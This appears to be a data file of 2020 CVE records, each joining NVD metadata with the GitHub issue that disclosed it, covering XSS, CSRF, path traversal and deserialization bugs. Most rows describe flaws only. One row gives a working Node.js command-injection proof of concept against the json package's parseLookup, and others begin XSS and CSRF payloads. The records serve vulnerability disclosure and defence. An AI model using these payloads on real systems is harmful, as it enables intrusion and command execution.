-... | Cross Site Script Vulnerability on module "Configuration" in NavigateCMS 2.9 | https://api.github.com/repos/NavigateCMS/Navigate-CMS/issues/11/comments | 2 | 2020-06-17T14:57:52Z | 2020-06-18T08:07:44Z | https://github.com/NavigateCMS/Navigate-CMS/issues/11 | 640,511,844 | 11 | 1,407 |
CVE-2020-23656 | 2020-08-26T17:15:12.833 | NavigateCMS 2.9 is affected by Cross Site Scripting (XSS) on module "Content." | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/NavigateCMS/Navigate-CMS/issues/12"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https:/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:naviwebs:navigatecms:2.9:*:*:*:*:*:*:*",
"matchCriteriaId": "54FE5CDA-77C7-441D-A61C-FF8171A1DF30",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"79"
] | 79 | https://github.com/NavigateCMS/Navigate-CMS/issues/12 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"NavigateCMS",
"Navigate-CMS"
] | **/Describe the bug/**
An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Content" feature Navigate
**/To Reproduce/**
Steps to reproduce the behavior:
1. Login into the panel
2. Go to 'navigate/navigate.php?fid=dashboard'
3. Go to Moudle "Content"
4. Chose:
- Go to "/... | Cross Site Script Vulnerability on module "Content" in NavigateCMS 2.9 | https://api.github.com/repos/NavigateCMS/Navigate-CMS/issues/12/comments | 2 | 2020-06-17T15:28:13Z | 2020-06-18T09:46:57Z | https://github.com/NavigateCMS/Navigate-CMS/issues/12 | 640,536,183 | 12 | 1,408 |
CVE-2020-15158 | 2020-08-26T18:15:10.287 | In libIEC61850 before version 1.4.3, when a message with COTP message length field with value < 4 is received an integer underflow will happen leading to heap buffer overflow. This can cause an application crash or on some platforms even the execution of remote code. If your application is used in open networks or ther... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/mz-automation/libiec61850/commit/033ab5b6488250c8c3b838f25a7cbc3e099230bb"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advis... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mz-automation:libiec61850:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1E993B84-2A79-45F0-BF40-4AF97ACF6F3D",
"versionEndExcluding": "1.4.3",
"versionEndIncluding": null,
"versionSt... | [
"191"
] | 191 | https://github.com/mz-automation/libiec61850/issues/250 | [
"Third Party Advisory"
] | github.com | [
"mz-automation",
"libiec61850"
] | COTP message is size field set to zero can cause invalid memory access. | Possible heap buffer overflow when COTP message with invalid size is received | https://api.github.com/repos/mz-automation/libiec61850/issues/250/comments | 2 | 2020-08-12T05:23:33Z | 2020-08-27T10:16:25Z | https://github.com/mz-automation/libiec61850/issues/250 | 677,394,865 | 250 | 1,409 |
CVE-2020-23659 | 2020-08-26T18:15:10.427 | WebPort-v1.19.17121 is affected by Cross Site Scripting (XSS) on the "connections" feature. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/r0ck3t1973/xss_payload/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:webport:web_port:1.19.17121:*:*:*:*:*:*:*",
"matchCriteriaId": "B90234D9-7BEB-4185-88B9-6CB1CF4A9E8C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStart... | [
"79"
] | 79 | https://github.com/r0ck3t1973/xss_payload/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"r0ck3t1973",
"xss_payload"
] | **Describe the bug**
An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "connections" feature.
**To Reproduce**
Steps to reproduce the behavior:
1, Login into the panel
2. Go to '/access/setup?type=conn'
3. Change connections
4. Insert Payload:
'><details/open/onto... | Cross Site Script Vulnerability on "connections" in WebPort-v1.19.17121 | https://api.github.com/repos/r0ck3t1973/xss_payload/issues/1/comments | 0 | 2020-06-23T03:11:09Z | 2020-09-01T08:47:37Z | https://github.com/r0ck3t1973/xss_payload/issues/1 | 643,495,077 | 1 | 1,410 |
CVE-2020-16610 | 2020-08-28T17:15:12.043 | Hoosk Codeigniter CMS before 1.7.2 is affected by a Cross Site Request Forgery (CSRF). When an attacker induces authenticated admin user to a malicious web page, any accounts can be deleted without admin user's intention. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/havok89/Hoosk/issues/53"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hoosk:hoosk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B8C02AC7-3B66-4B8A-BEBA-40E9E1CB97FA",
"versionEndExcluding": "1.7.2",
"versionEndIncluding": null,
"versionStartExcluding":... | [
"352"
] | 352 | https://github.com/havok89/Hoosk/issues/53 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"havok89",
"Hoosk"
] | Hi,bro.I also find an csrf issue in admin page.
When attacker induce authenticated admin user to a malicious web page, any accounts can be deleted without admin user's intention.
how to reproduce the issue.
1. Login to admin page.(/admin)
2. Keep login and access the html it has following content
```html
... | CSRF issue that allows attacker to delete an account | https://api.github.com/repos/havok89/Hoosk/issues/53/comments | 2 | 2020-04-12T01:21:37Z | 2020-05-08T04:19:22Z | https://github.com/havok89/Hoosk/issues/53 | 598,385,822 | 53 | 1,411 |
CVE-2020-7712 | 2020-08-30T08:15:11.900 | This affects the package json before 10.0.0. It is possible to inject arbritary commands using the parseLookup function. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/trentm/json/issues/144"
},
{
"source": "report@snyk.io",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/trentm/json/pull/145"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:joyent:json:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "E0DD27F0-787A-4CF4-84E6-2821C3101875",
"versionEndExcluding": "10.0.0",
"versionEndIncluding": null,
"versionStartExcl... | [
"78"
] | 78 | https://github.com/trentm/json/issues/144 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"trentm",
"json"
] | ## POC
```js
const json = require('json');
res = json.parseLookup('{[this.constructor.constructor("return process")().mainModule.require("child_process").execSync("id").toString()]:1}');
console.log(res);
``` | Command Injection | https://api.github.com/repos/trentm/json/issues/144/comments | 2 | 2020-08-06T07:10:51Z | 2020-08-28T22:52:35Z | https://github.com/trentm/json/issues/144 | 674,077,621 | 144 | 1,413 |
CVE-2020-23836 | 2020-09-01T17:15:12.230 | A Cross-Site Request Forgery (CSRF) vulnerability in edit_user.php in OSWAPP Warehouse Inventory System (aka OSWA-INV) through 2020-08-10 allows remote attackers to change the admin's password after an authenticated admin visits a third-party site. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/siamon123/warehouse-inventory-system/issues/55"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.exploit-db.com/exploits... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oswapp:warehouse_inventory_system:*:*:*:*:*:*:*:*",
"matchCriteriaId": "21BCA31C-3CA2-4A59-AA14-7F08F7A999CD",
"versionEndExcluding": null,
"versionEndIncluding": "2020-08-10",
... | [
"352"
] | 352 | https://github.com/siamon123/warehouse-inventory-system/issues/55 | [
"Third Party Advisory"
] | github.com | [
"siamon123",
"warehouse-inventory-system"
] | Cross-Site Request Forgery (CSRF) on `edit_user.php` page allows changing the admin password from a 3rd party site.
For fix see: https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html | CSRF Change Admin Password | https://api.github.com/repos/siamon123/warehouse-inventory-system/issues/55/comments | 0 | 2020-08-10T05:11:52Z | 2020-08-10T05:11:52Z | https://github.com/siamon123/warehouse-inventory-system/issues/55 | 675,867,337 | 55 | 1,414 |
CVE-2020-23839 | 2020-09-01T17:15:12.310 | A Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16, in the admin/index.php login portal webpage, allows remote attackers to execute JavaScript code in the client's browser and harvest login credentials after a client clicks a link, enters credentials, and submits the login form. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/162016/GetSimple-CMS-3.3.16-Cross-Site-Scripting-Shell-Upload.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisor... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:get-simple:getsimple_cms:3.3.16:*:*:*:*:*:*:*",
"matchCriteriaId": "30554CDA-8A09-4632-8857-0CA48F3B2B3E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionS... | [
"79"
] | 79 | https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1330 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"GetSimpleCMS",
"GetSimpleCMS"
] | Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16 in 'admin/index.php' login portal webpage allows remote attackers to execute JavaScript code in the clients browser & harvest login credentials via client clicking a link, entering credentials, and submitting login form. | Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16 in 'admin/index.php' | https://api.github.com/repos/GetSimpleCMS/GetSimpleCMS/issues/1330/comments | 9 | 2020-08-12T20:38:56Z | 2021-01-20T20:35:15Z | https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1330 | 677,963,854 | 1,330 | 1,415 |
CVE-2020-23814 | 2020-09-03T17:15:11.097 | Multiple cross-site scripting (XSS) vulnerabilities in xxl-job v2.2.0 allow remote attackers to inject arbitrary web script or HTML via (1) AppName and (2)AddressList parameter in JobGroupController.java file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/xuxueli/xxl-job/issues/1866"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.ccsq8.com/issues.html"
},
{
"sourc... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:xuxueli:xxl-job:2.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C7AE69F1-6781-47B8-933D-989F4EF5ED19",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | [
"79"
] | 79 | https://github.com/xuxueli/xxl-job/issues/1866 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"xuxueli",
"xxl-job"
] | Locate the executor management function:
https://github.com/xuxueli/xxl-job/blob/289f02185b952f4652a4a7daf4ac3c6384f338bc/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/JobGroupController.java
insert POC there has front-end validation,By code audit, I find that the back end only has length validation.Can be... | v2.2.0 Stored XSS vulnerabilities | https://api.github.com/repos/xuxueli/xxl-job/issues/1866/comments | 5 | 2020-07-30T09:30:54Z | 2021-02-16T15:18:29Z | https://github.com/xuxueli/xxl-job/issues/1866 | 668,541,948 | 1,866 | 1,416 |
CVE-2019-20916 | 2020-09-04T20:15:11.013 | The pip package before 19.2 for Python allows Directory Traversal when a URL is given in an install command, because a Content-Disposition header can have ../ in a filename, as demonstrated by overwriting the /root/.ssh/authorized_keys file. This occurs in _download_http_url in _internal/download.py. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00005.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": ... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pypa:pip:*:*:*:*:*:*:*:*",
"matchCriteriaId": "903FF43B-79F2-4F2A-BC24-12D52398B309",
"versionEndExcluding": "19.2",
"versionEndIncluding": null,
"versionStartExcluding": nul... | [
"22"
] | 22 | https://github.com/pypa/pip/issues/6413 | [
"Exploit",
"Patch"
] | github.com | [
"pypa",
"pip"
] | **Environment**
* pip version: pip 19.0.3
* Python version: Python 2.7.15 / Python 2.7.15
* OS: Ubuntu 16.04 / Windows 10
**Description**
This is a security vulnerability.
when installing a remote package via a specified URL "pip install \<url\>", A malicious server (or a network MitM if downloading over ... | pip install <url> allow directory traversal, leading to arbitrary file write | https://api.github.com/repos/pypa/pip/issues/6413/comments | 1 | 2019-04-16T17:23:55Z | 2019-07-11T08:57:21Z | https://github.com/pypa/pip/issues/6413 | 433,898,163 | 6,413 | 1,417 |
CVE-2020-24566 | 2020-09-09T16:15:11.923 | In Octopus Deploy 2020.3.x before 2020.3.4 and 2020.4.x before 2020.4.1, if an authenticated user creates a deployment or runbook process using Azure steps and sets the step's execution location to run on the server/worker, then (under certain circumstances) the account password is exposed in cleartext in the verbose t... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/OctopusDeploy/Issues/issues/6563"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/OctopusDeploy/Issues/issues/6564"
},
{
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:octopus:octopus_deploy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BBE2EA3F-968A-4528-A3C3-0FE92A4DB9DE",
"versionEndExcluding": "2020.3.4",
"versionEndIncluding": null,
"versionSt... | [
"532"
] | 532 | https://github.com/OctopusDeploy/Issues/issues/6563 | [
"Third Party Advisory"
] | github.com | [
"OctopusDeploy",
"Issues"
] | ## Description
<!-- Take the time to figure out a description for disclosure which gives customers enough detail to understand if they will be affected or not, without disclosing how to exploit the vulnerability to bad actors. -->
A regression was introduced that caused certain passwords to be written to the depl... | Passwords written to deployment log in plain-text | https://api.github.com/repos/OctopusDeploy/Issues/issues/6563/comments | 1 | 2020-09-08T03:28:35Z | 2020-09-10T06:08:43Z | https://github.com/OctopusDeploy/Issues/issues/6563 | 695,516,197 | 6,563 | 1,418 |
CVE-2020-24566 | 2020-09-09T16:15:11.923 | In Octopus Deploy 2020.3.x before 2020.3.4 and 2020.4.x before 2020.4.1, if an authenticated user creates a deployment or runbook process using Azure steps and sets the step's execution location to run on the server/worker, then (under certain circumstances) the account password is exposed in cleartext in the verbose t... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/OctopusDeploy/Issues/issues/6563"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/OctopusDeploy/Issues/issues/6564"
},
{
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:octopus:octopus_deploy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BBE2EA3F-968A-4528-A3C3-0FE92A4DB9DE",
"versionEndExcluding": "2020.3.4",
"versionEndIncluding": null,
"versionSt... | [
"532"
] | 532 | https://github.com/OctopusDeploy/Issues/issues/6564 | [
"Third Party Advisory"
] | github.com | [
"OctopusDeploy",
"Issues"
] | #6563 also affected `2020.3`. The fix has been shipped in the patch indicated by the milestone. If you are using `2020.3` we highly recommend applying this patch.
Learn about [Releases of Octopus Deploy Server](https://g.octopushq.com/longtermsupport).
| Passwords written to deployment log in plain-text | https://api.github.com/repos/OctopusDeploy/Issues/issues/6564/comments | 1 | 2020-09-08T03:44:23Z | 2020-09-10T06:08:53Z | https://github.com/OctopusDeploy/Issues/issues/6564 | 695,521,561 | 6,564 | 1,419 |
CVE-2020-25219 | 2020-09-09T21:15:11.117 | url::recvline in url.cpp in libproxy 0.4.x through 0.4.15 allows a remote HTTP server to trigger uncontrolled recursion via a response composed of an infinite stream that lacks a newline character. This leads to stack exhaustion. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00030.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": ... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libproxy_project:libproxy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "52AFAA1F-0DF9-41AD-BD7B-0A3B87679898",
"versionEndExcluding": null,
"versionEndIncluding": "0.4.15",
"versionS... | [
"674"
] | 674 | https://github.com/libproxy/libproxy/issues/134 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"libproxy",
"libproxy"
] | I found this in url.cpp:
```
static inline string recvline(int fd) {
// Read a character.
// If we don't get a character, return empty string.
// If we are at the end of the line, return empty string.
char c = '\0';
if (recv(fd, &c, 1, 0) != 1 || c == '\n')
return "";
return string(1, c) + recvl... | (CVE-2020-25219) pac server can trigger unbounded recursion in url.cpp recvline() | https://api.github.com/repos/libproxy/libproxy/issues/134/comments | 1 | 2020-09-07T17:47:52Z | 2020-09-10T12:22:38Z | https://github.com/libproxy/libproxy/issues/134 | 695,310,556 | 134 | 1,420 |
CVE-2020-24164 | 2020-09-11T06:15:11.903 | A deserialization flaw is present in Taoensso Nippy before 2.14.2. In some circumstances, it is possible for an attacker to create a malicious payload that, when deserialized, will allow arbitrary code to be executed. This occurs because there is automatic use of the Java Serializable interface. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ptaoussanis/nippy/issues/130"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ptaoussanis/nippy/issues/130... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:taoensso:nippy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7F0B82F0-2B55-4EAF-98CB-208211CE99EB",
"versionEndExcluding": "2.14.2",
"versionEndIncluding": null,
"versionStartExcludi... | [
"502"
] | 502 | https://github.com/ptaoussanis/nippy/issues/130 | [
"Third Party Advisory"
] | github.com | [
"ptaoussanis",
"nippy"
] | # SECURITY ADVISORY [CVE-2020-24164]
> This vulnerability kindly pointed out in an _excellent_ report by @solita-timo-mihaljov. _Huge_ thanks to Timo!
## Quick summary
- Nippy versions from `v2.5.0-beta1` (24 Oct 2013) and before `v2.15.0 final` (24 Jul 2020) contain an RCE (Remote Code Execution) vulnerabilit... | [CVE-2020-24164] Remote Code Execution (RCE) vulnerability via Java's Serializable interface | https://api.github.com/repos/taoensso/nippy/issues/130/comments | 5 | 2020-07-24T15:47:42Z | 2022-02-01T11:25:58Z | https://github.com/taoensso/nippy/issues/130 | 665,257,168 | 130 | 1,421 |
CVE-2020-14330 | 2020-09-11T18:15:13.147 | An Improper Output Neutralization for Logs flaw was found in Ansible when using the uri module, where sensitive data is exposed to content and json output. This flaw allows an attacker to access the logs or outputs of performed tasks to read keys used in playbooks from other users within the uri module. The highest thr... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-14330"
},
{
"source": "secalert@redhat.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:ansible_engine:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4AA51D54-94D6-4A3C-AD5B-190C68C5C5AE",
"versionEndExcluding": "2.9.12",
"versionEndIncluding": null,
"versionStart... | [
"532"
] | 532 | https://github.com/ansible/ansible/issues/68400 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ansible",
"ansible"
] | ##### SUMMARY
uri module set string with masked content into content and json output
##### ISSUE TYPE
- Bug Report
##### COMPONENT NAME
uri
##### ANSIBLE VERSION
<!--- Paste verbatim output from "ansible --version" between quotes -->
```paste below
ansible 2.9.0
config file = None
configured module... | uri module set string with masked content into content and json output | https://api.github.com/repos/ansible/ansible/issues/68400/comments | 12 | 2020-03-23T11:01:05Z | 2020-06-18T13:00:08Z | https://github.com/ansible/ansible/issues/68400 | 586,120,912 | 68,400 | 1,422 |
CVE-2020-25540 | 2020-09-14T13:15:10.220 | ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrarily file on a remote server via GET request encode parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "http://packetstormsecurity.com/files/159177/ThinkAdmin-6-Arbitrary-File-Read.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thinkadmin:thinkadmin:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "0E149B70-8FFA-469F-B90C-C3AE185F1658",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | [
"22"
] | 22 | https://github.com/zoujingli/ThinkAdmin/issues/244 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"zoujingli",
"ThinkAdmin"
] | # ThinkAdmin v6 列目录/任意文件读取
`app/admin/controller/api/Update.php`存在3个function,都是不用登录认证就可以使用的,引用列表如下:
```php
namespace app\admin\controller\api;
use think\admin\Controller;
use think\admin\service\InstallService;
use think\admin\service\ModuleService;
```
`version()`可以获取到当前版本:`2020.08.03.01`,≤这个版本的都有可能存在漏... | ThinkAdmin v6 未授权列目录/任意文件读取 | https://api.github.com/repos/zoujingli/ThinkAdmin/issues/244/comments | 6 | 2020-08-27T08:28:52Z | 2023-10-11T07:02:59Z | https://github.com/zoujingli/ThinkAdmin/issues/244 | 687,050,255 | 244 | 1,423 |
CVE-2020-25575 | 2020-09-14T19:15:11.397 | An issue was discovered in the failure crate through 0.1.5 for Rust. It may introduce "compatibility hazards" in some applications, and has a type confusion flaw when downcasting. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: This may overlap CVE-2019-25010 | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://boats.gitlab.io/blog/post/failure-to-fehler/"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/rust-lang-nurs... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:failure_project:failure:*:*:*:*:*:rust:*:*",
"matchCriteriaId": "4F8070E9-5A83-40C4-9E25-8B1BD2ECA198",
"versionEndExcluding": null,
"versionEndIncluding": "0.1.8",
"versionS... | [
"843"
] | 843 | https://github.com/rust-lang-nursery/failure/issues/336 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"rust-lang-nursery",
"failure"
] | I noticed that it is possible to cause type confusion in downcast by manually implementing `__private_get_type_id__`.
https://play.rust-lang.org/?version=stable&mode=debug&edition=2018&gist=ad66fe439660eb8373996bfd6bd7a835
Although the name of the function clearly shows that it is a private API, I believe a safe ... | Memory safe violation by abusing `__private_get_type_id__` | https://api.github.com/repos/rust-lang-deprecated/failure/issues/336/comments | 1 | 2019-11-13T21:37:22Z | 2019-11-13T22:14:21Z | https://github.com/rust-lang-deprecated/failure/issues/336 | 522,487,156 | 336 | 1,425 |
CVE-2020-25453 | 2020-09-15T22:15:13.507 | An issue was discovered in BlackCat CMS before 1.4. There is a CSRF vulnerability (bypass csrf_token) that allows remote arbitrary code execution. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/159237/BlackCat-CMS-1.3.6-Cross-Site-Request-Forgery.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:blackcat-cms:blackcat_cms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5B574187-3443-4F7B-8C08-A3F44304A0F4",
"versionEndExcluding": "1.4",
"versionEndIncluding": null,
"versionStar... | [
"352"
] | 352 | https://github.com/BlackCatDevelopment/BlackCatCMS/issues/389 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"BlackCatDevelopment",
"BlackCatCMS"
] | CSRF Bypass v1.3.6 | https://api.github.com/repos/BlackCatDevelopment/BlackCatCMS/issues/389/comments | 18 | 2020-05-30T21:28:59Z | 2020-09-01T11:28:39Z | https://github.com/BlackCatDevelopment/BlackCatCMS/issues/389 | 627,825,969 | 389 | 1,426 | |
